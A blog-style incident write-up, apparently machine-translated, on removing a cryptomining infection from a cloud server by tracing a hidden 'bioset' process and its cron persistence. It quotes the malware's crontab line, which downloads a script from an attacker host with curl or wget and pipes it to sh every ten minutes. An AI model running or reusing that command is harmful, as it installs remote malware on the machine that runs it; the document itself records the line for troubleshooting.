1. problem
Just get up early in the morning, Ali cloud send me a text message, reminding me of an emergency server security events: mining program
Ali cloud "close" to provide a solution, but need to purchase the Enterprise Edition of the security services, in line with their own hands can not spend money to do up their own principles
Then quickly check the internet to solve similar problems a lot, these scripts are being turned into mining of "chicken"
2. Troubleshooting
1) First of all top command to view the most CPU-intensive process bioset, to determine the so-called mining process
Here through online information to remind that after the attack the console output becomes credible, because the virus is likely to redirect or alter, conceal your output, there is a busybox can solve this problem, because here I do not have this happen so there is no use.
kill off the process, will continue to appear after a while, indicating the presence or daemon timing synchronization mechanism.
2) to find the file directory by process name
[root@hadoop1 sbin]# find / -name '*bioset*' /var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12/vje9c1vlq/bk20vm2o/xCkB12/bioset
There is a proc_1 of the catalog script file, presumed to be the guardian of the script, delete does not work (as well as synchronization mechanisms, then look)
3) Use crontab -l query task item, really tricky
[root@hadoop1 sbin]# crontab -l */10 * * * * (curl -fsSL --retry 3 -m180 "http://dl.djangocc.com:8080/p?a=p&a2=cron"||wget -q --tries=3 -T180 -O- "http://dl.djangocc.com:8080/p?a=p&a2=cron")|sh
The virus every 10 minutes to download from the djangocc.com shell script and execute, there can not be executed directly crontab -e, delete go after, then save and exit. This method fundamentally does not work, because will continue to be added.
3. Problem Solving
1) turn off the timer crond
systemctl stop crond # turn off the timer
systemctl disable crond.service # turn off the regular boot from the start
2) Removing crontab file
rm -rf /var/spool/cron/root
3) Delete virus files
rm -f /var/tmp/.systemd-private-c15c0d5284bd838c15fd0d6c5c2b50bb-systemd-resolved.service-xCkB12 / *
4) According to the virus before the top of the PID to stop the process
kill -9 2042
5) execute crontab -e go will delete all content, save and exit
crontab -e
6) Restart monitor, here top found no bioset, CPU occupancy is normal
(But remind, Ali cloud can go backstage and then confirm whether the CPU is operating under normal)
reference:
https://www.sunjs.com/article/detail/62c7ba45975946f89b3a1cd574a4856e.html